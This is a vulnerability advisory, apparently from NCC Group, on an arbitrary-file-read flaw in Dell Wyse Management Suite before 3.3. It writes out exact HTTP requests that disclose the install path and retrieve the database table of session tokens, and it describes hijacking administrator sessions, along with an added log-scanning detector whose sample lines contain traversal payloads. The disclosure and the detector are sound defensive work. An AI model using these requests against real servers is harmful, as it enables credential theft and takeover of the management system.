Vendor: Dell
Vendor URL: https://www.dell.com/support/home/en-us/product-support/product/wyse-wms/drivers
Versions affected: Prior to version 3.3
Systems Affected: Any
Author: Stephen Tomkinson stephen.tomkinson@nccgroup.com
Advisory URL / CVE Identifier: https://www.dell.com/support/kbdoc/en-us/000189363/dsa-2021-137-dell-wyse-management-suite-wms-security-update-for-multiple-vulnerabilities CVE-2021-21586, CVE-2021-21587
Risk: High – can lead to compromise of administrative sessions
Summary
Thin clients are often found in secure environments as their diskless operation reduces physical security risks. Wyse Management Suite (WMS) acts as a central hub for Dell’s thin client hardware, providing centralised provisioning and configuration. The Wyse Management Suite web interface and the configuration services used by the thin clients on boot are part of the same web application; it is therefore one of the few services which must be exposed to edge network connections even in secure environments.
On affected versions of WMS, it is possible to retrieve arbitrary files from the server, including database credentials and database files containing the session data of administrative users.
Location
The /ccm-web/image/os endpoint accepted filePath and fileName parameters which would retrieve files from anywhere on the operating system, e.g. GET /ccm-web/image/os?filePath=c:\windows&fileName=win.ini
Exploitation was aided by a second endpoint which revealed the path the product was installed to via a verbose error message. This could be triggered with PUT /ccm-web/image/pull/a/b
Impact
An attacker with physical access to a thin client and its network connection can exploit this vulnerability to gain access to the management interface of the whole thin client estate. The management interface includes features such as resetting BIOS passwords and remotely shadowing terminal screens via VNC.
Details
Access to the vulnerable endpoint was authenticated with a Wyse device ID. This ID can be retrieved from a configured Wyse thin client using a man-in-the-middle attack. As the WMS is used to provision TLS certificates, communication between a thin client and the WMS is often performed over TLS but without verification of the server certificate. This can be forced by a DNS or DHCP setting retrieved by the thin client early in the boot process.
With a valid device ID, a request to the vulnerable endpoints can be made, first to obtain the installation path of the software:
PUT /ccm-web/image/pull/a/b HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149
Which resulted in the following error, revealing the internal path:
HTTP/1.1 500
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=4443165646FDA1BA417D08917BFD17C7; Path=/ccm-web; Secure; HttpOnly
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 107
Date: Fri, 16 Apr 2021 10:51:51 GMT
Connection: close
E:Program FilesDELLSoftwarerepositoryimagePullstagingab (The system cannot find the path specified)
Then to the vulnerable endpoint to retrieve files:
GET /ccm-web/image/os?filePath=E:\Program Files\DELL\WMS\Database\SQL\stratus&fileName=persistentlogin.ibd HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149
Resulting in retrieval of the embedded MySQL database table that held the session tokens for authenticated users of the WMS. Extracting the JSESSIONID cookie value from this table permitted session hijacking.
Additional files of interest to an attacker include:
Path | Contains
{install_path}\Tomcat-9\webapps\ccm-web\WEB-INF\classes\bootstrap.properties | Database credentials encrypted with a fixed key
{install_path}\Database\SQL\stratus\person.ibd | Passwords for WMS administrative users, hashed as SHA256(MD5(pass), salt)
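As an added defender-side example (not part of this advisory or of Dell's code), the script below applies the containment check the image endpoint lacked, then runs it over constructed Tomcat-style access-log lines to flag requests that read outside an assumed repository root or probe the path-disclosing pull endpoint. The log format, the repository root E:\WMS\Repository and the client addresses are assumptions.

```python
import re
from pathlib import PureWindowsPath
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the advisory); root and addresses are illustrative.
SAMPLE_LOG = r"""
10.0.0.21 - - [16/Apr/2021:10:50:02 +0000] "GET /ccm-web/image/os?filePath=E:%5CWMS%5CRepository%5Cimages&fileName=win10.img HTTP/1.1" 200 4096
10.0.0.44 - - [16/Apr/2021:10:51:51 +0000] "PUT /ccm-web/image/pull/a/b HTTP/1.1" 500 107
10.0.0.44 - - [16/Apr/2021:10:52:10 +0000] "GET /ccm-web/image/os?filePath=E:%5CProgram%20Files%5CDELL%5CWMS%5CDatabase%5CSQL%5Cstratus&fileName=persistentlogin.ibd HTTP/1.1" 200 65536
10.0.0.44 - - [16/Apr/2021:10:52:20 +0000] "GET /ccm-web/image/os?filePath=E:%5CWMS%5CRepository%5C..%5C..%5Cwindows&fileName=win.ini HTTP/1.1" 200 512
""".strip().splitlines()

REPO_ROOT = PureWindowsPath(r"E:\WMS\Repository")  # assumed image repository root
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)')


def outside_root(file_path, file_name, root=REPO_ROOT):
    """True when filePath/fileName resolve outside root: the check the endpoint should
    have made. PureWindowsPath keeps '..' segments, so collapse them by hand first;
    path comparison is case-insensitive, as on Windows."""
    requested = PureWindowsPath(file_path) / file_name
    parts = list(requested.parts)
    anchor = parts.pop(0) if requested.anchor else ""  # drive anchor such as 'E:\\'
    norm = []
    for p in parts:
        if p == "..":
            if norm:
                norm.pop()
        else:
            norm.append(p)
    resolved = PureWindowsPath(anchor, *norm)
    return not (resolved == root or root in resolved.parents)


def flag_requests(lines, root=REPO_ROOT):
    """Return (ip, method, path_or_filePath, fileName, status) for image/os reads that
    leave root and for image/pull requests answered with a 500 (path disclosure)."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        q = parse_qs(url.query)  # percent-decodes %5C and %20 for us
        fp, fn = q.get("filePath", [""])[0], q.get("fileName", [""])[0]
        if url.path == "/ccm-web/image/os" and outside_root(fp, fn, root):
            hits.append((m["ip"], m["method"], fp, fn, m["status"]))
        elif url.path.startswith("/ccm-web/image/pull/") and m["status"] == "500":
            hits.append((m["ip"], m["method"], url.path, "", m["status"]))
    return hits
```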
Recommendation
Update to version 3.3 of Wyse Management Suite.
Vendor Communication
NCC Group Notifies Vendor: 7th May 2021
Vendor Replies Requesting More Details: 11th May 2021
NCC Group Sends Requested information: 11th May 2021
Vendor Confirms The Vulnerability: 20th May 2021
NCC Group Requests a Patch Date: 18th June 2021
Vendor Response With Date: 18th June 2021
Patch Advisory Published: July 6th 2021
Thanks to
Dave Cash at NCC Group
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
Published date: 6th July 2021
Written by: Stephen Tomkinson